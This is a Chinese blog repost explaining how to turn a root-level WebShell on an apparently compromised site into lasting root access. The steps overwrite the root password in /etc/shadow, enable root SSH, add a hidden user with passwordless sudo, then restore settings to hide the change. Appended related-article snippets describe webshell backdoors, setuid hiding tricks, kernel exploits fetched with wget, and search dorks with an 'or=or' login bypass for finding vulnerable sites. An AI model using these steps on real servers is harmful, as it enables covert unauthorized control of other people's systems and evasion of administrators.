linux提权 Root权限 WebShell提权

最新推荐文章于 2023-03-02 11:50:35 发布
最新推荐文章于 2023-03-02 11:50:35 发布
阅读量833 收藏
点赞数
文章标签: php shell 运维
原文链接:http://www.cnblogs.com/mujj/articles/2035638.html
版权
没啥技术含量,一种思路,让某些得到Root权限WebShell的同学可以快点拿到权限。

    某日拿到某站WebShell,RedHat(红旗linux)系统,Tomcat程序是Root身份启动的,WebShell当然也拥有Root权限。

具体提权思路:

1.WebShell直接替换Root密码:/etc/shadow    //记得备份

2.允许Root通过ssh登陆:
    修改:/etc/ssh/sshd_config
    PermitRootLogin yes   #允许Root登陆

3.重启ssh服务:service ssh restart

4.以Root身份登陆ssh,增加一个用户:
    useradd application
    passwd    //根据提示设置密码

5.更改application用户运行su不需密码:
   chmod +w /etc/sudoers    //增加写入权限,默认只读
   修改:/etc/sudoers
   vi /etc/sudoers
   加入:application   ALL=(ALL)        NOPASSWD: ALL

6.把Root密码修改回原样,禁止Root登陆。并去除sudoers的写属性(chmod -w /etc/sudoers)。

7.当然最后还要:chmod -w /etc/sudoers

2011050319372739.jpg

Root用户登陆。

2011050319374682.jpg

普通用户登陆,su免密码进入Root权限。

转载于:https://www.cnblogs.com/mujj/articles/2035638.html

weixin_30446197
关注
操作系统权限提升(二十)之Linux提权-计划任务提权
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-28 1064
先准备一个SUID文件或者权限为xx7的文件,让低权限的用户可以执行文件的修改,在这里我们我们准备一个sh文件或者python文件都可以,我们写一个linux运维脚本,来监控当前电脑的运行参数。linux计划任务提权是因为权限配置不当,计划任务以root权限运行,低权限的用户可以修改计划任务的文件,从而被攻击者利用,导致提权Linux计划任务命令如下。linux文件权第一部分是该文件的拥有者所拥有的权限,第二部分是该文件所在用户的用户所拥有的权限,最后一部分是其他用户所拥有的权限。
linux提权思路总结
weixin_43199413的博客
07-20 1380
linux提权思路总结 前言 说到提权,首先需要获得网站的webshell权限,再说提权的操作。 webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。 黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的。 webshell就是网站管理员,只有站长才可以提升你的权限。 除非你用不正当手法入侵网
LinuxWEBSHELL提权一技
06-15
LinuxWEBSHELL提权一技 用phpshell2.0和配合提ROOT,现在不少LINUX主机都还有这个本地溢出漏洞。
webshellLINUX提权+留后门
weixin_30861797的博客
05-02 125
方法一:setuid的方法,其实8是很隐蔽。看看过程: [root@localdomain lib]# ls -l |grep ld-linuxlrwxrwxrwx 1 root root 9 2008-06-07 17:32 ld-linux.so.2 -> ld-2.7.solrwxrwxrwx 1 root root 13 2008-06-07 17:47 ld-lsb.so.3 -...
webshell提权教程linux,LinuxWEBSHELL提权
weixin_42379854的博客
05-05 826
phpshell2.0和Linux Kernel2.6x 本地溢出代码配合提ROOT,现在不少LINUX主机都还有这个本地溢出漏洞。前提:1、目标机上安装了GCC能编译源码2、Kernel 2.6.x (>= 2.6.13 && < 2.6.17.4)因为是在webshell里溢出成功也得不到返回的ROOT SHELL,所以要稍微修改下源码,把当前运行...
LINUX提权入门手册
XINO
02-12 1338
简单介绍一下LINUX提权的大体结构和知识点
linux webshell下信息收集和一些提权常用的命令
asli33的专栏
04-14 2079
w -查看当前在线用户. useradd – 创建用户. usermod – 修改用户属性. cut -d: -f1,2,3 /etc/passwd | grep :: – 查看无密码账号 id – 查看当前用户各种id. cat /etc/passwd – 查看系统账号. last -30 -最后登录的30个用户. ps aux – 查看运行进程. ifconfig {eth0 etc} – 查看网卡信息. sudo – 普通用户运行root权限的命令,前提是 /etc/sudoer
webshellroot权限运行的linux提权笔记.txt
最新发布
01-09
Linux系统安全学习
webshell提权教程linux,webshellLINUX提权+留后门
weixin_29779159的博客
05-05 940
方法一:setuid的方法,其实8是很隐蔽。看看过程:[root@localdomain lib]# ls -l |grep ld-linuxlrwxrwxrwx 1 root root 9 2008-06-07 17:32 ld-linux.so.2 -> ld-2.7.solrwxrwxrwx 1 root root 13 2008-06-07 17:47 ld-lsb.so.3 -&g...
Linux提权宝典
LiBai'S BLOG
02-14 8000
提权思路:大概思路是通过信息搜集查找可利用的文件/脚本/软件/用户/内核漏洞/恶意劫持/特定平台漏洞/框架漏洞/件/等,写入或执行恶意命令/脚本/shell/添加高权限用户,提权成功,然后进一步利用。当拿到webshell权限时,由于权限太低有的命令和操作执行不了,所以这时候要提权。uname -a 命令看完Linux内核,直接上扫描器。扫描一下哪些EXP能用,然后直接拿EXP冲他。
webshell提权的教程
04-03
webshell到的教程.part1.rar
最全的WEBSHELL提权方法总结
12-28
最全的WEBSHELL提权方法总结,非常的经典。网站入侵和网络安全必看
webshell 提权
wing_7的博客
10-05 803
启动http服务时,使用的是win11 +kali + ubuntu,ubuntu 启动vulhub ,kali启动http服务,使用find 或者locate 获取文件路径,locate 初次使用可能没有任何显示,需要使用updatedb更新数据。ubuntu kali的地址ip 地址使用wget 对kernel cve 提权文件漏洞文件.c进行下载。由于使用wsl2 的配置未使用vmware ,在localhost 可以看到对应的文件。在exp 的路径下使用python启用web 服务。
linux怎么进入root权限
热门推荐
顺其自然~专栏
03-02 4万+
linux下系统的默认root用户是不被启用的,这和MS windows的做法恰恰相反,windows XP却是安装好系统好,就给你创建一个自动登录的管理员用户,不过Linux不一样的这一点也大大地增加了系统的安全性,但同时对我们的操作使用有了些特别的要求,下面我们就讲讲linux怎么进入root权限。推荐只有当要修改系统设置,或安装软件时才使用root用户的权限。
LinuxWEBSHELL提权
fengling132的专栏
03-30 2353
phpshell2.0和Linux Kernel2.6x 本地溢出代码配合提ROOT,现在不少LINUX主机都还有这个本地溢出漏洞。 前提:1、目标机上安装了GCC能编译源码                  2、Kernel 2.6.x         (>= 2.6.13 && 因为是在webshell里溢出成功也得不到返回的ROOT SHELL,所以要稍微修改下源码,把
webshell提权
free_xiaochen的博客
09-11 8706
提权 提权前奏 提权:主要是针对网站入侵过程中,当入侵某一网站时,通过各种漏洞提升webshell权限以夺得服务器权限 通常所处的权限:  ASP/PHP 匿名权限 ASPX USER权限 JSP 通常是系统权限 收集信息:  内外网 服务器系统和版本位数 服务器的补丁情况 服务器的安装软件情况 服务器的防护软件情况 端口情况 支持脚本情况 。。...
Linux系统提权思路
Just Do It
03-22 2万+
渗透测试过程中,拿到Webshell之后,常规都会去看一下系统是啥权限。这里主要讨论Linux系统的一些思路。       常规思路不用说了,先查看Linux内核版本,然后直接去搜一下是否有关于该版本的提权exp放出来,如果有的话,直接编译运行提权即可,简单粗暴。       如果没有相关内核的提权exp放出来,那就需要考虑其他思路了。这篇老外的文章,介绍了常规的三种提权思路,第一种就是内核e
webshell权限的45种方法
寒冬玉
03-24 1万+
1, 到GoogLe,搜索一些关键字,edit.asp? 韩国肉鸡为多,多数为MSSQL数据库! 2, 到Google ,site:cq.cn inurl:asp 3, 利用挖掘鸡和一个ASP木马. 文件名是login.asp 路径是/manage/ 关键词是went.asp 用or=or来登陆 4, 关键字:Co Net MIB Ver 1.0网站后台管理系统 帐号密码为 or=
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值